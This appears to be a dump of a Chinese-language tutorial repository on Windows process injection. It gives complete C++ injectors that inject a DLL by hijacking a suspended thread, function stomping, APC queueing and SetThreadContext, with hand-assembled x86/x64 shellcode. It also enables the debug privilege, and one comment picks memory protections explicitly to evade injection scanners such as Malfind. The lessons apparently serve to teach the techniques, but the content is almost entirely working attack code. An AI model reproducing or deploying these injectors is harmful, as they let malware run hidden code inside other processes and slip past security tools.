59 | #ifdef _WIN64
60 | //根据地址,修补我们的代码
61 | //修补dll的地址,我们把dll地址复制到RemoteDllPath的位置
62 | * reinterpret_cast(code + 0x10) = static_cast(RemoteDllPath);
63 | //修补LoadLibrary的地址
64 | *reinterpret_cast(code + 0x1a) = static_cast(loadLibraryAddress);
65 | //修补返回地址,为当前停止的地址的低32位
66 | *reinterpret_cast(code + 0x39) = ctx.Rip & 0xFFFFFFFF;
67 | //修补返回地址,为当前停止的地址的高32位
68 | *reinterpret_cast(code + 0x41) = ctx.Rip >> 32;
69 | #else
70 | //根据地址,修补我们的代码
71 | //修补dll的地址,我们把dll地址复制到RemoteDllPath的位置
72 | * reinterpret_cast(code + 2) = static_cast(RemoteDllPath);
73 | //修补LoadLibrary的地址
74 | *reinterpret_cast(code + 7) = static_cast(loadLibraryAddress);
75 | //修补返回地址,为当前停止的地址(eip指向即将执行代码的地址)
76 | *reinterpret_cast(code + 0xf) = ctx.Eip;
77 | #endif // _WIN64
78 |
79 | //写内存
80 | if (!WriteProcessMemory(pi.hProcess, RemoteDllPath, DllFullPath, strlen(DllFullPath) + 1, NULL)) {
81 | VirtualFreeEx(pi.hProcess, RemoteDllPath, strlen(DllFullPath) + 1, MEM_DECOMMIT);
82 | VirtualFreeEx(pi.hProcess, RemoteCodePath, sizeof(RemoteCodePath) + 1, MEM_DECOMMIT);
83 | return false;
84 | }
85 | if (!WriteProcessMemory(pi.hProcess, RemoteCodePath, code, sizeof(code) + 1, NULL)) {
86 | VirtualFreeEx(pi.hProcess, RemoteDllPath, strlen(DllFullPath) + 1, MEM_DECOMMIT);
87 | VirtualFreeEx(pi.hProcess, RemoteCodePath, sizeof(RemoteCodePath) + 1, MEM_DECOMMIT);
88 | return false;
89 | }
90 |
91 |
92 | #ifdef _WIN64
93 | //设置新的RIP指向Code首地址
94 | ctx.Rip = reinterpret_cast(RemoteCodePath);
95 | #else
96 | //设置新的EIP指向Code首地址
97 | ctx.Eip = reinterpret_cast(RemoteCodePath);
98 | #endif // _win64
99 | //恢复上下文
100 | ctx.ContextFlags = CONTEXT_CONTROL;
101 | SetThreadContext(pi.hThread, &ctx);
102 |
103 | //恢复执行程序
104 | ResumeThread(pi.hThread);
105 |
106 | Sleep(8000);
107 |
108 | VirtualFreeEx(pi.hProcess, RemoteDllPath, strlen(DllFullPath) + 1, MEM_DECOMMIT);
109 | VirtualFreeEx(pi.hProcess, RemoteCodePath, sizeof(RemoteCodePath) + 1, MEM_DECOMMIT);
110 |
111 | return true;
112 | }
113 |
114 |
115 | int main()
116 | {
117 | CHAR ProcessFullPath[MAX_PATH] = { 0 };
118 | printf("Input the Executable File Full Path:");
119 | cin >> ProcessFullPath;
120 | CHAR DllFullPath[MAX_PATH] = { 0 };
121 |
122 | #ifndef _WIN64
123 | strcpy_s(DllFullPath, "D:\\project\\TestDll\\Release\\TestDll.dll");
124 | #else // _WIN64
125 | strcpy_s(DllFullPath, "D:\\project\\TestDll\\x64\\Release\\TestDll.dll");
126 | #endif
127 |
128 | //注入
129 | if (!InjectDll(ProcessFullPath, DllFullPath)) {
130 | printf("Failed to inject DLL");
131 | return FALSE;
132 | }
133 | return 0;
134 | }
--------------------------------------------------------------------------------
/第五课/InjectWithCreateSuspended.vcxproj:
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/第八课/FunctionStomping.cpp:
--------------------------------------------------------------------------------
1 | // FunctionStomping.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
2 | //
3 |
4 | #include
5 | #include
6 | #include
7 | #include
8 | using namespace std;
9 |
10 | #pragma comment(lib, "Shlwapi.lib")
11 |
12 | BYTE* GetFunctionBase(HANDLE TargetProcessHandle, const wchar_t* moduleName, const char* functionName);
13 | BOOL InjectDll(ULONG32 ulTargetProcessID, CHAR* DllFullPath) {
14 | #ifdef _WIN64
15 | BYTE code[] = {
16 | 0x48, 0x83, 0xEC, 0x28, //sub rsp,28h
17 | 0x48, 0x89, 0x44, 0x24, 0x18, //mov qword ptr [rsp+18h],rax
18 | 0x48, 0x89, 0x4C, 0x24, 0x10, //mov qword ptr [rsp+10h],rcx
19 | 0x48, 0xB9, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, //mov rcx,1111111111111111h
20 | 0x48, 0xB8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, //mov rax,2222222222222222h
21 | 0xFF, 0xD0, //call rax
22 | 0x48, 0x8B, 0x4C, 0x24, 0x10, //mov rcx,qword ptr [rsp+10h]
23 | 0x48, 0x8B, 0x44, 0x24, 0x18, //mov rax,qword ptr [rsp+18h]
24 | 0x48, 0x83, 0xC4, 0x28, //add rsp,28h
25 | 0x48, 0x83, 0xEC, 0x08, //sub rsp,8
26 | 0xC7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, //mov dword ptr [rsp],ffffffffh
27 | 0xC7, 0x44, 0x24, 0x04, 0xff, 0xff, 0xff, 0xff, //mov dword ptr [rsp + 4], ffffffffh
28 | 0x58, //pop rax
29 | 0xC3 //ret
30 | };
31 | #else
32 | BYTE code[] = {
33 | 0x60, //pushad
34 | 0x68, 0x11, 0x11, 0x11, 0x11, //push 11111111h
35 | 0xb8, 0x22, 0x22, 0x22, 0x22, //mov eax, 22222222h
36 | 0xff, 0xd0, //call eax
37 | 0x61, //popad
38 | 0x0d, 0xff, 0xff, 0xff, 0xff, //or eax, ffffffffh
39 | 0xc3 //ret
40 | };
41 | #endif // _WIN64
42 | DWORD oldPermissions;
43 |
44 | //Gets the process handle for the target process
45 | HANDLE TargetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ulTargetProcessID);
46 | if (OpenProcess == NULL)
47 | {
48 | cout << "[-] Could not find process" << endl;
49 | }
50 | cout << "[+] Got process handle!" << endl;
51 |
52 | // Getting the remote module base.
53 | BYTE* functionBase = GetFunctionBase(TargetProcessHandle, L"Kernel32.dll", "CreateFileW");
54 |
55 | if (!functionBase) {
56 | DWORD lastError = GetLastError();
57 |
58 | if (lastError == 126) {
59 | cerr << "[-] The function name is misspelled or the function is unstompable." << endl;
60 | }
61 | else {
62 | cerr << "[-] Could not get function pointer: " << lastError << endl;
63 | }
64 | CloseHandle(TargetProcessHandle);
65 | return -1;
66 | }
67 |
68 | cout << "[+] Got function base!" << endl;
69 |
70 | // Verifying that the shellcode isn't too big.
71 | SIZE_T sizeToWrite = sizeof(code);
72 | BYTE* oldFunction;
73 |
74 | if (!ReadProcessMemory(TargetProcessHandle, functionBase, &oldFunction, sizeToWrite, NULL)) {
75 | cerr << "[-] Shellcode is too big!" << endl;
76 | CloseHandle(TargetProcessHandle);
77 | return -1;
78 | }
79 |
80 | //patch the shellcode
81 | //申请空间
82 | LPVOID RemoteDllPath = VirtualAllocEx(TargetProcessHandle, NULL, strlen(DllFullPath) + 1, MEM_COMMIT, PAGE_READWRITE);
83 | //write
84 | if (!WriteProcessMemory(TargetProcessHandle, RemoteDllPath, DllFullPath, strlen(DllFullPath) + 1, NULL)) {
85 | VirtualFreeEx(TargetProcessHandle, RemoteDllPath, strlen(DllFullPath) + 1, MEM_DECOMMIT);
86 | return false;
87 | }
88 | BYTE* loadLibraryAddress = GetFunctionBase(TargetProcessHandle, L"Kernel32.dll", "LoadLibraryA");
89 | #ifdef _WIN64
90 | * reinterpret_cast(code + 0x10) = static_cast(RemoteDllPath);
91 | //修补LoadLibrary的地址
92 | *reinterpret_cast(code + 0x1a) = static_cast(loadLibraryAddress);
93 | //修补返回地址,为当前停止的地址的低32位
94 | //*reinterpret_cast(code + 0x39) = ctx.Rip & 0xFFFFFFFF;
95 | ////修补返回地址,为当前停止的地址的高32位
96 | //*reinterpret_cast(code + 0x41) = ctx.Rip >> 32;
97 | #else
98 | //根据地址,修补我们的代码
99 | //修补dll的地址,我们把dll地址复制到RemoteDllPath的位置
100 | * reinterpret_cast(code + 2) = static_cast(RemoteDllPath);
101 | //修补LoadLibrary的地址
102 | *reinterpret_cast(code + 7) = static_cast(loadLibraryAddress);
103 |
104 | #endif // _WIN64
105 |
106 | // Changing the protection to READWRITE to write the shellcode.
107 | if (!VirtualProtectEx(TargetProcessHandle, functionBase, sizeToWrite, PAGE_EXECUTE_READWRITE, &oldPermissions)) {
108 | cerr << "[-] Failed to change protection: " << GetLastError() << endl;
109 | CloseHandle(TargetProcessHandle);
110 | return -1;
111 | }
112 | cout << "[+] Changed protection to RW to write the shellcode." << endl;
113 |
114 | SIZE_T written;
115 |
116 | // Writing the shellcode to the remote process.
117 | if (!WriteProcessMemory(TargetProcessHandle, functionBase, code, sizeof(code), &written)) {
118 | cerr << "[-] Failed to overwrite function: " << GetLastError() << endl;
119 | VirtualProtectEx(TargetProcessHandle, functionBase, sizeToWrite, oldPermissions, &oldPermissions);
120 | CloseHandle(TargetProcessHandle);
121 | return -1;
122 | }
123 |
124 | cout << "[+] Successfuly stomped the function!" << endl;
125 |
126 | // Changing the protection to WCX to evade injection scanners like Malfind: https://www.cyberark.com/resources/threat-research-blog/masking-malicious-memory-artifacts-part-iii-bypassing-defensive-scanners.
127 | if (!VirtualProtectEx(TargetProcessHandle, functionBase, sizeToWrite, PAGE_EXECUTE_WRITECOPY, &oldPermissions)) {
128 | cerr << "[-] Failed to change protection: " << GetLastError() << endl;
129 | CloseHandle(TargetProcessHandle);
130 | return -1;
131 | }
132 |
133 | cout << "[+] Changed protection to WCX to run the shellcode!\n[+] Shellcode successfuly injected!" << endl;
134 |
135 | CloseHandle(TargetProcessHandle);
136 | return TRUE;
137 | }
138 |
139 | // Based on: https://github.com/countercept/ModuleStomping/blob/master/injectionUtils/utils.cpp
140 | BYTE* GetFunctionBase(HANDLE TargetProcessHandle, const wchar_t* moduleName, const char* functionName) {
141 | BOOL res;
142 | DWORD moduleListSize;
143 | BYTE* functionBase = NULL;
144 |
145 | //Getting the size to allocate
146 | res = EnumProcessModules(TargetProcessHandle, NULL, 0, &moduleListSize);
147 |
148 | if (!res) {
149 | cerr << "[-] Failed to get buffer size for EnumProcessModules: " << GetLastError() << endl;
150 | return functionBase;
151 | }
152 |
153 | // Getting the module list.
154 | HMODULE* moduleList = (HMODULE*)malloc(moduleListSize);
155 |
156 | if (moduleList == 0) {
157 | return functionBase;
158 | }
159 | memset(moduleList, 0, moduleListSize);
160 |
161 | res = EnumProcessModules(TargetProcessHandle, moduleList, moduleListSize, &moduleListSize);
162 |
163 | if (!res) {
164 | // Retry this one more time.
165 | res = EnumProcessModules(TargetProcessHandle, moduleList, moduleListSize, &moduleListSize);
166 |
167 | if (!res) {
168 | cerr << "[-] Failed to EnumProcessModules: " << GetLastError() << endl;
169 | free(moduleList);
170 | return functionBase;
171 | }
172 | }
173 |
174 | // Iterating the modules of the process.
175 | for (HMODULE* modulePtr = &moduleList[0]; modulePtr < &moduleList[moduleListSize / sizeof(HMODULE)]; modulePtr++) {
176 | HMODULE currentModule = *modulePtr;
177 | wchar_t currentModuleName[MAX_PATH];
178 | memset(currentModuleName, 0, MAX_PATH);
179 |
180 | // Getting the module name.
181 | if (GetModuleFileNameEx(TargetProcessHandle, currentModule, currentModuleName, MAX_PATH - sizeof(wchar_t)) == 0) {
182 | cerr << "[-] Failed to get module name: " << GetLastError() << endl;
183 | continue;
184 | }
185 |
186 | // Checking if it is the module we seek.
187 | if (StrStrI(currentModuleName, moduleName) != NULL) {
188 |
189 | functionBase = (BYTE*)GetProcAddress(currentModule, functionName);
190 | break;
191 | }
192 | }
193 |
194 | free(moduleList);
195 | return functionBase;
196 | }
197 |
198 | int main()
199 | {
200 | ULONG32 ulProcessID = 0;
201 | cout << "Input the Process ID:" << endl;
202 | cin >> ulProcessID;
203 | CHAR DllFullPath[MAX_PATH] = { 0 };
204 | #ifndef _WIN64
205 | strcpy_s(DllFullPath, "D:\\project\\TestDll\\Release\\TestDll.dll");
206 | #else // _WIN64
207 | strcpy_s(DllFullPath, "D:\\project\\TestDll\\x64\\Release\\TestDll.dll");
208 | #endif
209 | //注入
210 | if (!InjectDll(ulProcessID, DllFullPath)) {
211 | printf("Failed to inject DLL");
212 | return FALSE;
213 | }
214 | return 0;
215 | }
216 |
--------------------------------------------------------------------------------
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/第六课/APCInjectRing3.cpp:
--------------------------------------------------------------------------------
1 | // APCInjectRing3.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
2 | //
3 |
4 | #include
5 | #include
6 | #include
7 | using namespace std;
8 |
9 | //列出指定进程的所有线程
10 | BOOL GetProcessThreadList(DWORD th32ProcessID, DWORD** ppThreadIdList, LPDWORD pThreadIdListLength) {
11 | DWORD dwThreadIdListLength = 0;
12 | DWORD dwThreadIdListMaxCount = 2000;
13 | LPDWORD pThreadIdList = NULL;
14 | HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
15 | pThreadIdList = (LPDWORD)VirtualAlloc(NULL, dwThreadIdListMaxCount * sizeof(DWORD), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
16 | if (pThreadIdList == NULL) {
17 | return FALSE;
18 | }
19 | RtlZeroMemory(pThreadIdList, dwThreadIdListMaxCount * sizeof(DWORD));
20 | THREADENTRY32 th32 = { 0 };
21 | //对指定进程拍摄快照
22 | hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, th32ProcessID);
23 | if (hThreadSnap == INVALID_HANDLE_VALUE)
24 | return(FALSE);
25 | //使用前先填写结构的大小
26 | th32.dwSize = sizeof(THREADENTRY32);
27 | //遍历所有THREADENTRY32结构, 按顺序填入数组
28 | BOOL bRet = Thread32First(hThreadSnap, &th32);
29 | while (bRet) {
30 | if (th32.th32OwnerProcessID == th32ProcessID) {
31 | if (dwThreadIdListLength >= dwThreadIdListMaxCount) {
32 | break;
33 | }
34 | pThreadIdList[dwThreadIdListLength++] = th32.th32ThreadID;
35 | }
36 | bRet = Thread32Next(hThreadSnap, &th32);
37 | }
38 | *pThreadIdListLength = dwThreadIdListLength;
39 | *ppThreadIdList = pThreadIdList;
40 | return TRUE;
41 | }
42 |
43 |
44 | BOOL DoInjection(HANDLE hProcess, CHAR* wzDllFullPath, LPDWORD pThreadIdList, DWORD dwThreadIdListLength) {
45 | //申请内存
46 | WCHAR* lpAddr = NULL;
47 | SIZE_T page_size = 4096;
48 | lpAddr = (WCHAR*)VirtualAllocEx(hProcess, nullptr, page_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
49 | if (!lpAddr) {
50 | VirtualFreeEx(hProcess, lpAddr, page_size, MEM_DECOMMIT);
51 | CloseHandle(hProcess);
52 | return FALSE;
53 | }
54 |
55 | //把Dll的路径复制到内存中
56 | if (!WriteProcessMemory(hProcess, lpAddr, wzDllFullPath, (strlen(wzDllFullPath) + 1) * sizeof(wzDllFullPath), nullptr)) {
57 | VirtualFreeEx(hProcess, lpAddr, page_size, MEM_DECOMMIT);
58 | CloseHandle(hProcess);
59 | return FALSE;
60 | }
61 |
62 | //获得LoadLibraryA的地址
63 | auto loadLibraryAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
64 | //遍历APC
65 | float fail = 0;
66 | for (int i = dwThreadIdListLength - 1; i >= 0; i--) {
67 | HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadIdList[i]);
68 | if (hThread) {
69 | if (!QueueUserAPC((PAPCFUNC)loadLibraryAddress, hThread, (ULONG_PTR)lpAddr)) {
70 | fail++;
71 | }
72 | CloseHandle(hThread);
73 | hThread = NULL;
74 | }
75 | }
76 | printf("Total Thread: %d\n", dwThreadIdListLength);
77 | printf("Total Failed: %d\n", (int)fail);
78 | if ((int)fail == 0 || dwThreadIdListLength / fail > 0.5) {
79 | printf("Success to Inject APC\n");
80 | return TRUE;
81 | }
82 | else {
83 | printf("Inject may be failed\n");
84 | return FALSE;
85 | }
86 | }
87 |
88 | int main()
89 | {
90 | ULONG32 ulProcessID = 0;
91 | printf("Input the Process ID:");
92 | cin >> ulProcessID;
93 | CHAR wzDllFullPath[MAX_PATH] = { 0 };
94 | LPDWORD pThreadIdList = NULL;
95 | DWORD dwThreadIdListLength = 0;
96 |
97 | #ifndef _WIN64
98 | strcpy_s(wzDllFullPath, "D:\\project\\TestDll\\Release\\TestDll.dll");
99 | #else // _WIN64
100 | strcpy_s(wzDllFullPath, "D:\\project\\TestDll\\x64\\Release\\TestDll.dll");
101 | #endif
102 |
103 | if (!GetProcessThreadList(ulProcessID, &pThreadIdList, &dwThreadIdListLength)) {
104 | printf("Can not list the threads!\n");
105 | exit(0);
106 | }
107 |
108 | //打开句柄资源
109 | HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ulProcessID);
110 | if (hProcess == NULL) {
111 | printf("failed to open Process\n");
112 | return FALSE;
113 | }
114 |
115 | //注入
116 | if (!DoInjection(hProcess, wzDllFullPath, pThreadIdList, dwThreadIdListLength)) {
117 | printf("Failed to inject DLL\n");
118 | return FALSE;
119 | }
120 | return 0;
121 | }
122 |
123 |
--------------------------------------------------------------------------------
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/第四课/InjectWithSetThreadContext.cpp:
--------------------------------------------------------------------------------
1 | // InjectWithSetThreadContext.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
2 | //
3 |
4 | #include
5 | #include
6 | #include
7 | #include
8 | using namespace std;
9 |
10 | //使能seDebug权限
11 | BOOL EnableDebugPrivilege() {
12 | HANDLE TokenHandle = NULL;
13 | TOKEN_PRIVILEGES TokenPrivilege;
14 |
15 | LUID uID;
16 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle)) {
17 | if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &uID)) {
18 | TokenPrivilege.PrivilegeCount = 1;
19 | TokenPrivilege.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
20 | TokenPrivilege.Privileges[0].Luid = uID;
21 | if (AdjustTokenPrivileges(TokenHandle, FALSE, &TokenPrivilege, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
22 | CloseHandle(TokenHandle);
23 | TokenHandle = INVALID_HANDLE_VALUE;
24 | return TRUE;
25 | }
26 | else
27 | goto Fail;
28 |
29 | }
30 | else
31 | goto Fail;
32 | }
33 | else
34 | goto Fail;
35 |
36 | Fail:
37 | CloseHandle(TokenHandle);
38 | TokenHandle = INVALID_HANDLE_VALUE;
39 | return FALSE;
40 | }
41 |
42 |
43 | //列出指定进程的所有线程
44 | BOOL GetProcessThreadList(DWORD th32ProcessID) {
45 | HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
46 | THREADENTRY32 th32;
47 | printf("Trying to list all threads in Pid: %ld\n", th32ProcessID);
48 | //对指定进程拍摄快照
49 | hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, th32ProcessID);
50 | if (hThreadSnap == INVALID_HANDLE_VALUE)
51 | return(FALSE);
52 | //使用前先填写结构的大小
53 | th32.dwSize = sizeof(THREADENTRY32);
54 | //检索有关第一个线程的信息
55 | if (!Thread32First(hThreadSnap, &th32))
56 | {
57 | CloseHandle(hThreadSnap);
58 | return FALSE;
59 | }
60 | //循环枚举线程列表并显示有关线程的信息
61 | do
62 | {
63 | if (th32.th32OwnerProcessID == th32ProcessID)
64 | {
65 | printf("\tThreadID: %ld \t", th32.th32ThreadID); //显示找到的线程的ID
66 | printf("\tbase priority: %ld\n", th32.tpBasePri); //显示线程优先级
67 | }
68 | } while (Thread32Next(hThreadSnap, &th32));
69 | //清除快照对象
70 | CloseHandle(hThreadSnap);
71 | return TRUE;
72 | }
73 |
74 |
75 | BOOL DoInjection(HANDLE hProcess, HANDLE hThread, CHAR* wzDllFullPath) {
76 | //待注入的代码模板
77 | #ifdef _WIN64
78 | BYTE code[] = {
79 | 0x48, 0x83, 0xEC, 0x28, //sub rsp,28h
80 | 0x48, 0x89, 0x44, 0x24, 0x18, //mov qword ptr [rsp+18h],rax
81 | 0x48, 0x89, 0x4C, 0x24, 0x10, //mov qword ptr [rsp+10h],rcx
82 | 0x48, 0xB9, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, //mov rcx,1111111111111111h
83 | 0x48, 0xB8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, //mov rax,2222222222222222h
84 | 0xFF, 0xD0, //call rax
85 | 0x48, 0x8B, 0x4C, 0x24, 0x10, //mov rcx,qword ptr [rsp+10h]
86 | 0x48, 0x8B, 0x44, 0x24, 0x18, //mov rax,qword ptr [rsp+18h]
87 | 0x48, 0x83, 0xC4, 0x28, //add rsp,28h
88 | 0x48, 0x83, 0xEC, 0x08, //sub rsp,8
89 | 0xC7, 0x04, 0x24, 0x33, 0x33, 0x33, 0x33, //mov dword ptr [rsp],33333333h
90 | 0xC7, 0x44, 0x24, 0x04, 0x33, 0x33, 0x33, 0x33, //mov dword ptr [rsp + 4], 33333333h
91 | 0xC3 //ret
92 | };
93 | #else
94 | BYTE code[] = {
95 | 0x60,
96 | 0x68, 0x11, 0x11, 0x11, 0x11,
97 | 0xb8, 0x22, 0x22, 0x22, 0x22,
98 | 0xff, 0xd0,
99 | 0x61,
100 | 0x68, 0x33, 0x33, 0x33, 0x33,
101 | 0xc3
102 | };
103 | #endif // _WIN64
104 |
105 |
106 | //申请内存
107 | WCHAR* buffer = NULL;
108 | SIZE_T page_size = 4096;
109 | buffer = (WCHAR*)VirtualAllocEx(hProcess, nullptr, page_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
110 | if (!buffer) {
111 | VirtualFreeEx(hProcess, buffer, page_size, MEM_DECOMMIT | MEM_RELEASE);
112 | CloseHandle(hThread);
113 | CloseHandle(hProcess);
114 | return FALSE;
115 | }
116 | printf("Buffer in remote Process: %p\n", buffer);
117 |
118 | //挂起目前线程
119 | if (SuspendThread(hThread) == -1) {
120 | VirtualFreeEx(hProcess, buffer, page_size, MEM_DECOMMIT | MEM_RELEASE);
121 | CloseHandle(hThread);
122 | CloseHandle(hProcess);
123 | return FALSE;
124 | }
125 | //获取线程上下文
126 | CONTEXT context;
127 | context.ContextFlags = CONTEXT_FULL;
128 | if (!GetThreadContext(hThread, &context)) {
129 | VirtualFreeEx(hProcess, buffer, page_size, MEM_DECOMMIT | MEM_RELEASE);
130 | CloseHandle(hThread);
131 | CloseHandle(hProcess);
132 | return FALSE;
133 | }
134 |
135 | //获取LoadLibrary地址
136 | auto loadLibraryAddress = ::GetProcAddress(::GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
137 | #ifdef _WIN64
138 | //根据地址,修补我们的代码
139 | //修补dll的地址,我们等会儿会把dll地址复制到buffer + 0x60 的位置
140 | * reinterpret_cast(code + 0x10) = static_cast(buffer + 0x60);
141 | //修补LoadLibrary的地址
142 | *reinterpret_cast(code + 0x1a) = static_cast(loadLibraryAddress);
143 | //修补返回地址,为当前停止的地址的低32位
144 | *reinterpret_cast(code + 0x39) = context.Rip & 0xFFFFFFFF;
145 | //修补返回地址,为当前停止的地址的高32位
146 | *reinterpret_cast(code + 0x41) = context.Rip >> 32 ;
147 | #else
148 | //根据地址,修补我们的代码
149 | //修补dll的地址,我们等会儿会把dll地址复制到buffer + 0x60 的位置
150 | *reinterpret_cast(code + 2) = static_cast(buffer + 0x60);
151 | //修补LoadLibrary的地址
152 | *reinterpret_cast(code + 7) = static_cast(loadLibraryAddress);
153 | //修补返回地址,为当前停止的地址(eip指向即将执行代码的地址)
154 | *reinterpret_cast(code + 0xf) = context.Eip;
155 | #endif // _WIN64
156 |
157 | //把函数复制到内存中
158 | if (!WriteProcessMemory(hProcess, buffer, code, sizeof(code), nullptr)) {
159 | VirtualFreeEx(hProcess, buffer, page_size, MEM_DECOMMIT | MEM_RELEASE);
160 | CloseHandle(hThread);
161 | CloseHandle(hProcess);
162 | return FALSE;
163 | }
164 | //把Dll的路径复制到内存中
165 | if (!WriteProcessMemory(hProcess, buffer + 0x60, wzDllFullPath, (strlen(wzDllFullPath)+1)*sizeof(wzDllFullPath), nullptr)) {
166 | VirtualFreeEx(hProcess, buffer, page_size, MEM_DECOMMIT | MEM_RELEASE);
167 | CloseHandle(hThread);
168 | CloseHandle(hProcess);
169 | return FALSE;
170 | }
171 |
172 | //将新的指令指针指向添加的代码并恢复线程执行
173 | #ifdef _WIN64
174 | context.Rip = reinterpret_cast(buffer);
175 | #else
176 | context.Eip = reinterpret_cast(buffer);
177 | #endif // _win64
178 |
179 | if (!SetThreadContext(hThread, &context)) {
180 | VirtualFreeEx(hProcess, buffer, page_size, MEM_DECOMMIT | MEM_RELEASE);
181 | CloseHandle(hThread);
182 | CloseHandle(hProcess);
183 | return FALSE;
184 | }
185 | ResumeThread(hThread);
186 |
187 | return TRUE;
188 | }
189 |
190 |
191 | int _tmain(int argc, _TCHAR* argv[])
192 | {
193 | if (EnableDebugPrivilege() == FALSE) {
194 | return 0;
195 | }
196 | ULONG32 ulProcessID = 0;
197 | ULONG32 ulThreadID = 0;
198 | printf("Input the Process ID:");
199 | cin >> ulProcessID;
200 | CHAR wzDllFullPath[MAX_PATH] = { 0 };
201 |
202 | #ifndef _WIN64
203 | strcpy_s(wzDllFullPath, "D:\\project\\TestDll\\Release\\TestDll.dll");
204 | #else // _WIN64
205 | strcpy_s(wzDllFullPath, "D:\\project\\TestDll\\x64\\Release\\TestDll.dll");
206 | #endif
207 |
208 | if (!GetProcessThreadList(ulProcessID)) {
209 | printf("Can not list the threads!");
210 | exit(0);
211 | }
212 | printf("Input the Thread ID:");
213 | cin >> ulThreadID;
214 | //打开句柄资源
215 | HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ulProcessID);
216 | if (hProcess == NULL) {
217 | printf("failed to open Process");
218 | return FALSE;
219 | }
220 | HANDLE hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT, FALSE, ulThreadID);
221 | if (hThread == NULL) {
222 | printf("failed to open Thread");
223 | return FALSE;
224 | }
225 | //注入
226 | if (!DoInjection(hProcess, hThread, wzDllFullPath)) {
227 | printf("Failed to inject DLL");
228 | return FALSE;
229 | }
230 | return 0;
231 | }
232 |
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